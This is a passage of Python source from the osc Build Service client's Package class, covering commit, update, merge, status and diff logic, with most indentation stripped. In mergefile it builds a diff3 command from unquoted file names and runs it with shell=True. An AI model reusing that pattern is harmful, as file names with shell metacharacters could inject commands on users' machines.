self.update_local_filesmeta()
else:
print("{} Not commited because is link to a different project".format(self.name))
return 1
if not self.todo:
self.todo = [i for i in self.to_be_added if not i in self.filenamelist] + self.filenamelist
pathn = getTransActPath(self.dir)
todo_send = {}
todo_delete = []
real_send = []
for filename in self.filenamelist + [i for i in self.to_be_added if not i in self.filenamelist]:
if filename.startswith('_service:') or filename.startswith('_service_'):
continue
st = self.status(filename)
if st == 'C':
print('Please resolve all conflicts before committing using "osc resolved FILE"!')
return 1
elif filename in self.todo:
if st in ('A', 'R', 'M'):
todo_send[filename] = dgst(os.path.join(self.absdir, filename))
real_send.append(filename)
print(statfrmt('Sending', os.path.join(pathn, filename)))
elif st in (' ', '!', 'S'):
if st == '!' and filename in self.to_be_added:
print('file \'%s\' is marked as \'A\' but does not exist' % filename)
return 1
f = self.findfilebyname(filename)
if f is None:
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' with state \'%s\' is not known by meta' \
% (filename, st))
todo_send[filename] = f.md5
elif st == 'D':
todo_delete.append(filename)
print(statfrmt('Deleting', os.path.join(pathn, filename)))
elif st in ('R', 'M', 'D', ' ', '!', 'S'):
# ignore missing new file (it's not part of the current commit)
if st == '!' and filename in self.to_be_added:
continue
f = self.findfilebyname(filename)
if f is None:
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' with state \'%s\' is not known by meta' \
% (filename, st))
todo_send[filename] = f.md5
if not force and not real_send and not todo_delete and not self.islinkrepair() and not self.ispulled():
print('nothing to do for package %s' % self.name)
return 1
print('Transmitting file data', end=' ')
filelist = self.__generate_commitlist(todo_send)
sfilelist = self.__send_commitlog(msg, filelist)
send = self.commit_get_missing(sfilelist)
real_send = [i for i in real_send if not i in send]
# abort after 3 tries
tries = 3
tdir = None
try:
tdir = os.path.join(self.storedir, '_in_commit')
if os.path.isdir(tdir):
shutil.rmtree(tdir)
os.mkdir(tdir)
while len(send) and tries:
for filename in send[:]:
sys.stdout.write('.')
sys.stdout.flush()
self.put_source_file(filename, tdir)
send.remove(filename)
tries -= 1
sfilelist = self.__send_commitlog(msg, filelist)
send = self.commit_get_missing(sfilelist)
if len(send):
raise oscerr.PackageInternalError(self.prjname, self.name,
'server does not accept filelist:\n%s\nmissing:\n%s\n' \
% (ET.tostring(filelist, encoding=ET_ENCODING), ET.tostring(sfilelist, encoding=ET_ENCODING)))
# these files already exist on the server
for filename in real_send:
self.put_source_file(filename, tdir, copy_only=True)
# update store with the committed files
self.__commit_update_store(tdir)
finally:
if tdir is not None and os.path.isdir(tdir):
shutil.rmtree(tdir)
self.rev = sfilelist.get('rev')
print()
print('Committed revision %s.' % self.rev)
if self.ispulled():
os.unlink(os.path.join(self.storedir, '_pulled'))
if self.islinkrepair():
os.unlink(os.path.join(self.storedir, '_linkrepair'))
self.linkrepair = False
# XXX: mark package as invalid?
print('The source link has been repaired. This directory can now be removed.')
if self.islink() and self.isexpanded():
li = Linkinfo()
li.read(sfilelist.find('linkinfo'))
if li.xsrcmd5 is None:
raise oscerr.APIError('linkinfo has no xsrcmd5 attr:\n%s\n' % ET.tostring(sfilelist, encoding=ET_ENCODING))
sfilelist = ET.fromstring(self.get_files_meta(revision=li.xsrcmd5))
for i in sfilelist.findall('entry'):
if i.get('name') in self.skipped:
i.set('skipped', 'true')
store_write_string(self.absdir, '_files', ET.tostring(sfilelist, encoding=ET_ENCODING) + '\n')
for filename in todo_delete:
self.to_be_deleted.remove(filename)
self.delete_storefile(filename)
self.write_deletelist()
self.write_addlist()
self.update_datastructs()
print_request_list(self.apiurl, self.prjname, self.name)
# FIXME: add testcases for this codepath
sinfo = sfilelist.find('serviceinfo')
if sinfo is not None:
print('Waiting for server side source service run')
u = makeurl(self.apiurl, ['source', self.prjname, self.name])
while sinfo is not None and sinfo.get('code') == 'running':
sys.stdout.write('.')
sys.stdout.flush()
# does it make sense to add some delay?
sfilelist = ET.fromstring(http_GET(u).read())
                # if sinfo is None another commit might have occurred in the meantime
sinfo = sfilelist.find('serviceinfo')
print('')
rev = self.latest_rev()
self.update(rev=rev)
elif self.get_local_meta() is None:
# if this was a newly added package there is no _meta
# file
self.update_local_pacmeta()
def __write_storelist(self, name, data):
if len(data) == 0:
try:
os.unlink(os.path.join(self.storedir, name))
except:
pass
else:
store_write_string(self.absdir, name, '%s\n' % '\n'.join(data))
def write_conflictlist(self):
self.__write_storelist('_in_conflict', self.in_conflict)
def updatefile(self, n, revision, mtime=None):
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
origfile_tmp = os.path.join(self.storedir, '_in_update', '%s.copy' % n)
origfile = os.path.join(self.storedir, '_in_update', n)
if os.path.isfile(filename):
shutil.copyfile(filename, origfile_tmp)
os.rename(origfile_tmp, origfile)
else:
origfile = None
get_source_file(self.apiurl, self.prjname, self.name, n, targetfilename=storefilename,
revision=revision, progress_obj=self.progress_obj, mtime=mtime, meta=self.meta)
shutil.copyfile(storefilename, filename)
if mtime:
utime(filename, (-1, mtime))
if not origfile is None:
os.unlink(origfile)
def mergefile(self, n, revision, mtime=None):
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
myfilename = os.path.join(self.dir, n + '.mine')
upfilename = os.path.join(self.dir, n + '.r' + self.rev)
origfile_tmp = os.path.join(self.storedir, '_in_update', '%s.copy' % n)
origfile = os.path.join(self.storedir, '_in_update', n)
shutil.copyfile(filename, origfile_tmp)
os.rename(origfile_tmp, origfile)
os.rename(filename, myfilename)
get_source_file(self.apiurl, self.prjname, self.name, n,
revision=revision, targetfilename=upfilename,
progress_obj=self.progress_obj, mtime=mtime, meta=self.meta)
if binary_file(myfilename) or binary_file(upfilename):
# don't try merging
shutil.copyfile(upfilename, filename)
shutil.copyfile(upfilename, storefilename)
os.unlink(origfile)
self.in_conflict.append(n)
self.write_conflictlist()
return 'C'
else:
# try merging
# diff3 OPTIONS... MINE OLDER YOURS
merge_cmd = 'diff3 -m -E %s %s %s > %s' % (myfilename, storefilename, upfilename, filename)
ret = run_external(merge_cmd, shell=True)
# "An exit status of 0 means `diff3' was successful, 1 means some
# conflicts were found, and 2 means trouble."
if ret == 0:
# merge was successful... clean up
shutil.copyfile(upfilename, storefilename)
os.unlink(upfilename)
os.unlink(myfilename)
os.unlink(origfile)
return 'G'
elif ret == 1:
# unsuccessful merge
shutil.copyfile(upfilename, storefilename)
os.unlink(origfile)
self.in_conflict.append(n)
self.write_conflictlist()
return 'C'
else:
raise oscerr.ExtRuntimeError('diff3 failed with exit code: %s' % ret, merge_cmd)
def update_local_filesmeta(self, revision=None):
"""
Update the local _files file in the store.
It is replaced with the version pulled from upstream.
"""
meta = self.get_files_meta(revision=revision)
store_write_string(self.absdir, '_files', meta + '\n')
def get_files_meta(self, revision='latest', skip_service=True):
fm = show_files_meta(self.apiurl, self.prjname, self.name, revision=revision, meta=self.meta)
# look for "too large" files according to size limit and mark them
root = ET.fromstring(fm)
for e in root.findall('entry'):
size = e.get('size')
if size and self.size_limit and int(size) > self.size_limit \
or skip_service and (e.get('name').startswith('_service:') or e.get('name').startswith('_service_')):
e.set('skipped', 'true')
return ET.tostring(root, encoding=ET_ENCODING)
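    # Hedged usage note (not part of upstream osc): get_files_meta() only marks
    # oversized files and generated _service files with skipped="true"; callers
    # are expected to honour that flag themselves, e.g.
    #   root = ET.fromstring(pac.get_files_meta(revision='latest'))
    #   skipped = [e.get('name') for e in root.findall('entry') if e.get('skipped')]
    # where "pac" is assumed to be an existing Package instance.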
def get_local_meta(self):
"""Get the local _meta file for the package."""
meta = store_read_file(self.absdir, '_meta')
return meta
def get_local_origin_project(self):
"""Get the originproject from the _meta file."""
# if the wc was checked out via some old osc version
# there might be no meta file: in this case we assume
# that the origin project is equal to the wc's project
meta = self.get_local_meta()
if meta is None:
return self.prjname
root = ET.fromstring(meta)
return root.get('project')
def is_link_to_different_project(self):
"""Check if the package is a link to a different project."""
if self.name == "_project":
return False
orgprj = self.get_local_origin_project()
return self.prjname != orgprj
def update_datastructs(self):
"""
Update the internal data structures if the local _files
file has changed (e.g. update_local_filesmeta() has been
called).
"""
import fnmatch
files_tree = read_filemeta(self.dir)
files_tree_root = files_tree.getroot()
self.rev = files_tree_root.get('rev')
self.srcmd5 = files_tree_root.get('srcmd5')
self.linkinfo = Linkinfo()
self.linkinfo.read(files_tree_root.find('linkinfo'))
self.serviceinfo = DirectoryServiceinfo()
self.serviceinfo.read(files_tree_root.find('serviceinfo'))
self.filenamelist = []
self.filelist = []
self.skipped = []
for node in files_tree_root.findall('entry'):
try:
f = File(node.get('name'),
node.get('md5'),
int(node.get('size')),
int(node.get('mtime')))
if node.get('skipped'):
self.skipped.append(f.name)
f.skipped = True
except:
# okay, a very old version of _files, which didn't contain any metadata yet...
f = File(node.get('name'), '', 0, 0)
self.filelist.append(f)
self.filenamelist.append(f.name)
self.to_be_added = read_tobeadded(self.absdir)
self.to_be_deleted = read_tobedeleted(self.absdir)
self.in_conflict = read_inconflict(self.absdir)
self.linkrepair = os.path.isfile(os.path.join(self.storedir, '_linkrepair'))
self.size_limit = read_sizelimit(self.dir)
self.meta = self.ismetamode()
# gather unversioned files, but ignore some stuff
self.excluded = []
for i in os.listdir(self.dir):
for j in conf.config['exclude_glob']:
if fnmatch.fnmatch(i, j):
self.excluded.append(i)
break
self.filenamelist_unvers = [ i for i in os.listdir(self.dir)
if i not in self.excluded
if i not in self.filenamelist ]
def islink(self):
"""tells us if the package is a link (has 'linkinfo').
A package with linkinfo is a package which links to another package.
Returns True if the package is a link, otherwise False."""
return self.linkinfo.islink()
def isexpanded(self):
"""tells us if the package is a link which is expanded.
Returns True if the package is expanded, otherwise False."""
return self.linkinfo.isexpanded()
def islinkrepair(self):
"""tells us if we are repairing a broken source link."""
return self.linkrepair
def ispulled(self):
"""tells us if we have pulled a link."""
return os.path.isfile(os.path.join(self.storedir, '_pulled'))
def isfrozen(self):
"""tells us if the link is frozen."""
return os.path.isfile(os.path.join(self.storedir, '_frozenlink'))
def ismetamode(self):
"""tells us if the package is in meta mode"""
return os.path.isfile(os.path.join(self.storedir, '_meta_mode'))
def get_pulled_srcmd5(self):
pulledrev = None
for line in open(os.path.join(self.storedir, '_pulled'), 'r'):
pulledrev = line.strip()
return pulledrev
def haslinkerror(self):
"""
        Returns True if the link is broken, otherwise False.
If the package is not a link it returns False.
"""
return self.linkinfo.haserror()
def linkerror(self):
"""
        Returns an error message if the link is broken, otherwise None.
If the package is not a link it returns None.
"""
return self.linkinfo.error
def hasserviceinfo(self):
"""
        Returns True if this package contains services.
"""
return self.serviceinfo.lsrcmd5 is not None or self.serviceinfo.xsrcmd5 is not None
def update_local_pacmeta(self):
"""
Update the local _meta file in the store.
It is replaced with the version pulled from upstream.
"""
meta = show_package_meta(self.apiurl, self.prjname, self.name)
if meta != "":
# is empty for _project for example
meta = ''.join(meta)
store_write_string(self.absdir, '_meta', meta + '\n')
def findfilebyname(self, n):
for i in self.filelist:
if i.name == n:
return i
def get_status(self, excluded=False, *exclude_states):
global store
todo = self.todo
if not todo:
todo = self.filenamelist + self.to_be_added + \
[i for i in self.filenamelist_unvers if not os.path.isdir(os.path.join(self.absdir, i))]
if excluded:
todo.extend([i for i in self.excluded if i != store])
todo = set(todo)
res = []
for fname in sorted(todo):
st = self.status(fname)
if not st in exclude_states:
res.append((st, fname))
return res
def status(self, n):
"""
status can be:
file storefile file present STATUS
exists exists in _files
x - - 'A' and listed in _to_be_added
x x - 'R' and listed in _to_be_added
x x x ' ' if digest differs: 'M'
and if in conflicts file: 'C'
x - - '?'
- x x 'D' and listed in _to_be_deleted
x x x 'D' and listed in _to_be_deleted (e.g. if deleted file was modified)
x x x 'C' and listed in _in_conflict
x - x 'S' and listed in self.skipped
- - x 'S' and listed in self.skipped
- x x '!'
- - - NOT DEFINED
"""
known_by_meta = False
exists = False
exists_in_store = False
localfile = os.path.join(self.absdir, n)
if n in self.filenamelist:
known_by_meta = True
if os.path.exists(localfile):
exists = True
if os.path.exists(os.path.join(self.storedir, n)):
exists_in_store = True
if n in self.to_be_deleted:
state = 'D'
elif n in self.in_conflict:
state = 'C'
elif n in self.skipped:
state = 'S'
elif n in self.to_be_added and exists and exists_in_store:
state = 'R'
elif n in self.to_be_added and exists:
state = 'A'
elif exists and exists_in_store and known_by_meta:
filemeta = self.findfilebyname(n)
state = ' '
if conf.config['status_mtime_heuristic']:
if os.path.getmtime(localfile) != filemeta.mtime and dgst(localfile) != filemeta.md5:
state = 'M'
elif dgst(localfile) != filemeta.md5:
state = 'M'
elif n in self.to_be_added and not exists:
state = '!'
elif not exists and exists_in_store and known_by_meta and not n in self.to_be_deleted:
state = '!'
elif exists and not exists_in_store and not known_by_meta:
state = '?'
elif not exists_in_store and known_by_meta:
# XXX: this codepath shouldn't be reached (we restore the storefile
# in update_datastructs)
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' is known by meta but no storefile exists.\n'
'This might be caused by an old wc format. Please backup your current\n'
'wc and checkout the package again. Afterwards copy all files (except the\n'
'.osc/ dir) into the new package wc.' % n)
elif os.path.islink(localfile):
# dangling symlink, whose name is _not_ tracked: treat it
# as unversioned
state = '?'
else:
            # this case shouldn't happen (except if there was a typo in the filename, etc.)
raise oscerr.OscIOError(None, 'osc: \'%s\' is not under version control' % n)
return state
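    # Hedged usage note (not part of upstream osc): status() is usually driven
    # through get_status(), which walks the whole working copy, e.g.
    #   pac = Package('.')
    #   for st, fname in pac.get_status(False, ' '):
    #       print(statfrmt(st, fname))
    # The ' ' state is excluded so that unmodified files are not listed; the
    # working copy path is a placeholder.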
def get_diff(self, revision=None, ignoreUnversioned=False):
import tempfile
diff_hdr = 'Index: %s\n'
diff_hdr += '===================================================================\n'
kept = []
added = []
deleted = []
def diff_add_delete(fname, add, revision):
diff = []
diff.append(diff_hdr % fname)
tmpfile = None
origname = fname
if add:
diff.append('--- %s\t(revision 0)\n' % fname)
rev = 'revision 0'
if revision and not fname in self.to_be_added:
rev = 'working copy'
diff.append('+++ %s\t(%s)\n' % (fname, rev))
fname = os.path.join(self.absdir, fname)
else:
diff.append('--- %s\t(revision %s)\n' % (fname, revision or self.rev))
diff.append('+++ %s\t(working copy)\n' % fname)
fname = os.path.join(self.storedir, fname)
try:
if revision is not None and not add:
(fd, tmpfile) = tempfile.mkstemp(prefix='osc_diff')
get_source_file(self.apiurl, self.prjname, self.name, origname, tmpfile, revision)
fname = tmpfile
if binary_file(fname):
what = 'added'
if not add:
what = 'deleted'
diff = diff[:1]
diff.append('Binary file \'%s\' %s.\n' % (origname, what))
return diff
tmpl = '+%s'
ltmpl = '@@ -0,0 +1,%d @@\n'
if not add:
tmpl = '-%s'
ltmpl = '@@ -1,%d +0,0 @@\n'
lines = [tmpl % i for i in open(fname, 'r').readlines()]
if len(lines):
diff.append(ltmpl % len(lines))
if not lines[-1].endswith('\n'):
lines.append('\n\\ No newline at end of file\n')
diff.extend(lines)
finally:
if tmpfile is not None:
os.close(fd)
os.unlink(tmpfile)
return diff
if revision is None:
todo = self.todo or [i for i in self.filenamelist if not i in self.to_be_added]+self.to_be_added
for fname in todo:
if fname in self.to_be_added and self.status(fname) == 'A':
added.append(fname)
elif fname in self.to_be_deleted:
deleted.append(fname)
elif fname in self.filenamelist:
kept.append(self.findfilebyname(fname))
elif fname in self.to_be_added and self.status(fname) == '!':
raise oscerr.OscIOError(None, 'file \'%s\' is marked as \'A\' but does not exist\n'\
'(either add the missing file or revert it)' % fname)
elif not ignoreUnversioned:
raise oscerr.OscIOError(None, 'file \'%s\' is not under version control' % fname)
else:
fm = self.get_files_meta(revision=revision)
root = ET.fromstring(fm)
rfiles = self.__get_files(root)
# swap added and deleted
kept, deleted, added, services = self.__get_rev_changes(rfiles)
added = [f.name for f in added]
added.extend([f for f in self.to_be_added if not f in kept])
deleted = [f.name for f in deleted]
deleted.extend(self.to_be_deleted)
for f in added[:]:
if f in deleted:
added.remove(f)
deleted.remove(f)
# print kept, added, deleted
for f in kept:
state = self.status(f.name)
if state in ('S', '?', '!'):
continue
elif state == ' ' and revision is None:
continue
elif revision and self.findfilebyname(f.name).md5 == f.md5 and state != 'M':
continue
yield [diff_hdr % f.name]
if revision is None:
yield get_source_file_diff(self.absdir, f.name, self.rev)
else:
tmpfile = None
diff = []
try:
(fd, tmpfile) = tempfile.mkstemp(prefix='osc_diff')
get_source_file(self.apiurl, self.prjname, self.name, f.name, tmpfile, revision)
diff = get_source_file_diff(self.absdir, f.name, revision,
os.path.basename(tmpfile), os.path.dirname(tmpfile), f.name)
finally:
if tmpfile is not None:
os.close(fd)
os.unlink(tmpfile)
yield diff
for f in added:
yield diff_add_delete(f, True, revision)
for f in deleted:
yield diff_add_delete(f, False, revision)
def merge(self, otherpac):
self.todo += otherpac.todo
def __str__(self):
r = """
name: %s
prjname: %s
workingdir: %s
localfilelist: %s
linkinfo: %s
rev: %s
'todo' files: %s
""" % (self.name,
self.prjname,
self.dir,
'\n '.join(self.filenamelist),
self.linkinfo,
self.rev,
self.todo)
return r
def read_meta_from_spec(self, spec = None):
import glob
if spec:
specfile = spec
else:
# scan for spec files
speclist = glob.glob(os.path.join(self.dir, '*.spec'))
if len(speclist) == 1:
specfile = speclist[0]
elif len(speclist) > 1:
print('the following specfiles were found:')
for filename in speclist:
print(filename)
print('please specify one with --specfile')
sys.exit(1)
else:
print('no specfile was found - please specify one ' \
'with --specfile')
sys.exit(1)
data = read_meta_from_spec(specfile, 'Summary', 'Url', '%description')
self.summary = data.get('Summary', '')
self.url = data.get('Url', '')
self.descr = data.get('%description', '')
def update_package_meta(self, force=False):
"""
        For the updatepacmetafromspec subcommand.
        The force argument suppresses the confirmation question.
"""
m = ''.join(show_package_meta(self.apiurl, self.prjname, self.name))
root = ET.fromstring(m)
root.find('title').text = self.summary
root.find('description').text = ''.join(self.descr)
url = root.find('url')
        if url is None:
url = ET.SubElement(root, 'url')
url.text = self.url
u = makeurl(self.apiurl, ['source', self.prjname, self.name, '_meta'])
mf = metafile(u, ET.tostring(root, encoding=ET_ENCODING))
if not force:
print('*' * 36, 'old', '*' * 36)
print(m)
print('*' * 36, 'new', '*' * 36)
print(ET.tostring(root, encoding=ET_ENCODING))
print('*' * 72)
repl = raw_input('Write? (y/N/e) ')
else:
repl = 'y'
if repl == 'y':
mf.sync()
elif repl == 'e':
mf.edit()
mf.discard()
def mark_frozen(self):
store_write_string(self.absdir, '_frozenlink', '')
print()
print("The link in this package (\"%s\") is currently broken. Checking" % self.name)
print("out the last working version instead; please use 'osc pull'")
print("to merge the conflicts.")
print()
def unmark_frozen(self):
if os.path.exists(os.path.join(self.storedir, '_frozenlink')):
os.unlink(os.path.join(self.storedir, '_frozenlink'))
def latest_rev(self, include_service_files=False, expand=False):
# if expand is True the xsrcmd5 will be returned (even if the wc is unexpanded)
if self.islinkrepair():
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrepair=1, meta=self.meta, include_service_files=include_service_files)
elif self.islink() and (self.isexpanded() or expand):
if self.isfrozen() or self.ispulled():
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev=self.linkinfo.srcmd5, meta=self.meta, include_service_files=include_service_files)
else:
try:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
except:
try:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev=self.linkinfo.srcmd5, meta=self.meta, include_service_files=include_service_files)
except:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev="base", meta=self.meta, include_service_files=include_service_files)
self.mark_frozen()
elif not self.islink() and expand:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
else:
upstream_rev = show_upstream_rev(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
return upstream_rev
def __get_files(self, fmeta_root):
f = []
if fmeta_root.get('rev') is None and len(fmeta_root.findall('entry')) > 0:
raise oscerr.APIError('missing rev attribute in _files:\n%s' % ''.join(ET.tostring(fmeta_root, encoding=ET_ENCODING)))
for i in fmeta_root.findall('entry'):
error = i.get('error')
if error is not None:
raise oscerr.APIError('broken files meta: %s' % error)
skipped = i.get('skipped') is not None
f.append(File(i.get('name'), i.get('md5'),
int(i.get('size')), int(i.get('mtime')), skipped))
return f
def __get_rev_changes(self, revfiles):
kept = []
added = []
deleted = []
services = []
revfilenames = []
for f in revfiles:
revfilenames.append(f.name)
# treat skipped like deleted files
if f.skipped:
if f.name.startswith('_service:'):
services.append(f)
else:
deleted.append(f)
continue
# treat skipped like added files
# problem: this overwrites existing files during the update
# (because skipped files aren't in self.filenamelist_unvers)
if f.name in self.filenamelist and not f.name in self.skipped:
kept.append(f)
else:
added.append(f)
for f in self.filelist:
if not f.name in revfilenames:
deleted.append(f)
return kept, added, deleted, services
def update_needed(self, sinfo):
        # this method might return a false positive (that is, True is returned
        # even though no update is needed); for details, see the comments below
if self.islink():
if self.isexpanded():
# check if both revs point to the same expanded sources
# Note: if the package contains a _service file, sinfo.srcmd5's lsrcmd5
# points to the "expanded" services (xservicemd5) => chances
# for a false-positive are high, because osc usually works on the
# "unexpanded" services.
# Once the srcserver supports something like noservice=1, we can get rid of
                # these false positives (a patch was already sent to the mailing list),
                # but this also requires some slight changes in osc
return sinfo.get('srcmd5') != self.srcmd5
elif self.hasserviceinfo():
# check if we have expanded or unexpanded services
if self.serviceinfo.isexpanded():
return sinfo.get('lsrcmd5') != self.srcmd5
else:
# again, we might have a false-positive here, because
# a mismatch of the "xservicemd5"s does not neccessarily
# imply a change in the "unexpanded" services.
return sinfo.get('lsrcmd5') != self.serviceinfo.xsrcmd5
# simple case: unexpanded sources and no services
# self.srcmd5 should also work
return sinfo.get('lsrcmd5') != self.linkinfo.lsrcmd5
elif self.hasserviceinfo():
if self.serviceinfo.isexpanded():
return sinfo.get('srcmd5') != self.srcmd5
else:
# cannot handle this case, because the sourceinfo does not contain
# information about the lservicemd5. Once the srcserver supports
# a noservice=1 query parameter, we can handle this case.
return True
return sinfo.get('srcmd5') != self.srcmd5
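    # Hedged illustration (not part of upstream osc): update_needed() only reads
    # md5 attributes from a <sourceinfo /> element, so a caller could do
    #   sinfo = ET.fromstring('<sourceinfo srcmd5="..." lsrcmd5="..." />')
    #   if pac.update_needed(sinfo):
    #       pac.update()
    # keeping the false-positive cases described above in mind; the element
    # contents here are placeholders.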
def update(self, rev = None, service_files = False, size_limit = None):
import tempfile
rfiles = []
# size_limit is only temporary for this update
old_size_limit = self.size_limit
if not size_limit is None:
self.size_limit = int(size_limit)
if os.path.isfile(os.path.join(self.storedir, '_in_update', '_files')):
print('resuming broken update...')
root = ET.parse(os.path.join(self.storedir, '_in_update', '_files')).getroot()
rfiles = self.__get_files(root)
kept, added, deleted, services = self.__get_rev_changes(rfiles)
# check if we aborted in the middle of a file update
broken_file = os.listdir(os.path.join(self.storedir, '_in_update'))
broken_file.remove('_files')
if len(broken_file) == 1:
origfile = os.path.join(self.storedir, '_in_update', broken_file[0])
wcfile = os.path.join(self.absdir, broken_file[0])
origfile_md5 = dgst(origfile)
origfile_meta = self.findfilebyname(broken_file[0])
if origfile.endswith('.copy'):
# ok it seems we aborted at some point during the copy process
# (copy process == copy wcfile to the _in_update dir). remove file+continue
os.unlink(origfile)
elif self.findfilebyname(broken_file[0]) is None:
# should we remove this file from _in_update? if we don't
# the user has no chance to continue without removing the file manually
raise oscerr.PackageInternalError(self.prjname, self.name,
                    '\'%s\' is not known by meta but exists in \'_in_update\' dir' % broken_file[0])
elif os.path.isfile(wcfile) and dgst(wcfile) != origfile_md5:
(fd, tmpfile) = tempfile.mkstemp(dir=self.absdir, prefix=broken_file[0]+'.')
os.close(fd)
os.rename(wcfile, tmpfile)
os.rename(origfile, wcfile)
print('warning: it seems you modified \'%s\' after the broken ' \
'update. Restored original file and saved modified version ' \
'to \'%s\'.' % (wcfile, tmpfile))
elif not os.path.isfile(wcfile):
# this is strange... because it existed before the update. restore it
os.rename(origfile, wcfile)
else:
# everything seems to be ok
os.unlink(origfile)
elif len(broken_file) > 1:
raise oscerr.PackageInternalError(self.prjname, self.name, 'too many files in \'_in_update\' dir')
tmp = rfiles[:]
for f in tmp:
if os.path.exists(os.path.join(self.storedir, f.name)):
if dgst(os.path.join(self.storedir, f.name)) == f.md5:
if f in kept:
kept.remove(f)
elif f in added:
added.remove(f)
# this can't happen
elif f in deleted:
deleted.remove(f)
if not service_files:
services = []
self.__update(kept, added, deleted, services, ET.tostring(root, encoding=ET_ENCODING), root.get('rev'))
os.unlink(os.path.join(self.storedir, '_in_update', '_files'))
os.rmdir(os.path.join(self.storedir, '_in_update'))
# ok everything is ok (hopefully)...
fm = self.get_files_meta(revision=rev)
root = ET.fromstring(fm)
rfiles = self.__get_files(root)
store_write_string(self.absdir, '_files', fm + '\n', subdir='_in_update')
kept, added, deleted, services = self.__get_rev_changes(rfiles)
if not service_files:
services = []
self.__update(kept, added, deleted, services, fm, root.get('rev'))
os.unlink(os.path.join(self.storedir, '_in_update', '_files'))
if os.path.isdir(os.path.join(self.storedir, '_in_update')):
os.rmdir(os.path.join(self.storedir, '_in_update'))
self.size_limit = old_size_limit
def __update(self, kept, added, deleted, services, fm, rev):
pathn = getTransActPath(self.dir)
# check for conflicts with existing files
for f in added:
if f.name in self.filenamelist_unvers:
raise oscerr.PackageFileConflict(self.prjname, self.name, f.name,
'failed to add file \'%s\' file/dir with the same name already exists' % f.name)
# ok, the update can't fail due to existing files
for f in added:
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('A', os.path.join(pathn, f.name)))
for f in deleted:
# if the storefile doesn't exist we're resuming an aborted update:
# the file was already deleted but we cannot know this
# OR we're processing a _service: file (simply keep the file)
if os.path.isfile(os.path.join(self.storedir, f.name)) and self.status(f.name) not in ('M', 'C'):
# if self.status(f.name) != 'M':
self.delete_localfile(f.name)
self.delete_storefile(f.name)
print(statfrmt('D', os.path.join(pathn, f.name)))
if f.name in self.to_be_deleted:
self.to_be_deleted.remove(f.name)
self.write_deletelist()
elif f.name in self.in_conflict:
self.in_conflict.remove(f.name)
self.write_conflictlist()
for f in kept:
state = self.status(f.name)
# print f.name, state
if state == 'M' and self.findfilebyname(f.name).md5 == f.md5:
# remote file didn't change
pass
elif state == 'M':
# try to merge changes
merge_status = self.mergefile(f.name, rev, f.mtime)
print(statfrmt(merge_status, os.path.join(pathn, f.name)))
elif state == '!':
self.updatefile(f.name, rev, f.mtime)
print('Restored \'%s\'' % os.path.join(pathn, f.name))
elif state == 'C':
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.storedir, f.name), revision=rev,
progress_obj=self.progress_obj, mtime=f.mtime, meta=self.meta)
print('skipping \'%s\' (this is due to conflicts)' % f.name)
elif state == 'D' and self.findfilebyname(f.name).md5 != f.md5:
# XXX: in the worst case we might end up with f.name being
# in _to_be_deleted and in _in_conflict... this needs to be checked
if os.path.exists(os.path.join(self.absdir, f.name)):
merge_status = self.mergefile(f.name, rev, f.mtime)
print(statfrmt(merge_status, os.path.join(pathn, f.name)))
if merge_status == 'C':
# state changes from delete to conflict
self.to_be_deleted.remove(f.name)
self.write_deletelist()
else:
# XXX: we cannot recover this case because we've no file
# to backup
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('U', os.path.join(pathn, f.name)))
elif state == ' ' and self.findfilebyname(f.name).md5 != f.md5:
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('U', os.path.join(pathn, f.name)))
# checkout service files
for f in services:
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.absdir, f.name), revision=rev,
progress_obj=self.progress_obj, mtime=f.mtime, meta=self.meta)
print(statfrmt('A', os.path.join(pathn, f.name)))
store_write_string(self.absdir, '_files', fm + '\n')
if not self.meta:
self.update_local_pacmeta()
self.update_datastructs()
print('At revision %s.' % self.rev)
def run_source_services(self, mode=None, singleservice=None, verbose=None):
if self.name.startswith("_"):
return 0
curdir = os.getcwd()
os.chdir(self.absdir) # e.g. /usr/lib/obs/service/verify_file fails if not inside the project dir.
si = Serviceinfo()
if os.path.exists('_service'):
if self.filenamelist.count('_service') or self.filenamelist_unvers.count('_service'):
try:
service = ET.parse(os.path.join(self.absdir, '_service')).getroot()
except ET.ParseError as v:
line, column = v.position
print('XML error in _service file on line %s, column %s' % (line, column))
sys.exit(1)
si.read(service)
si.getProjectGlobalServices(self.apiurl, self.prjname, self.name)
r = si.execute(self.absdir, mode, singleservice, verbose)
os.chdir(curdir)
return r
def revert(self, filename):
if not filename in self.filenamelist and not filename in self.to_be_added:
raise oscerr.OscIOError(None, 'file \'%s\' is not under version control' % filename)
elif filename in self.skipped:
raise oscerr.OscIOError(None, 'file \'%s\' is marked as skipped and cannot be reverted' % filename)
if filename in self.filenamelist and not os.path.exists(os.path.join(self.storedir, filename)):
            raise oscerr.PackageInternalError(self.prjname, self.name,
                'file \'%s\' is listed in filenamelist but no storefile exists' % filename)
state = self.status(filename)
if not (state == 'A' or state == '!' and filename in self.to_be_added):
shutil.copyfile(os.path.join(self.storedir, filename), os.path.join(self.absdir, filename))
if state == 'D':
self.to_be_deleted.remove(filename)
self.write_deletelist()
elif state == 'C':
self.clear_from_conflictlist(filename)
elif state in ('A', 'R') or state == '!' and filename in self.to_be_added:
self.to_be_added.remove(filename)
self.write_addlist()
@staticmethod
def init_package(apiurl, project, package, dir, size_limit=None, meta=False, progress_obj=None):
global store
if not os.path.exists(dir):
os.mkdir(dir)
elif not os.path.isdir(dir):
raise oscerr.OscIOError(None, 'error: \'%s\' is no directory' % dir)
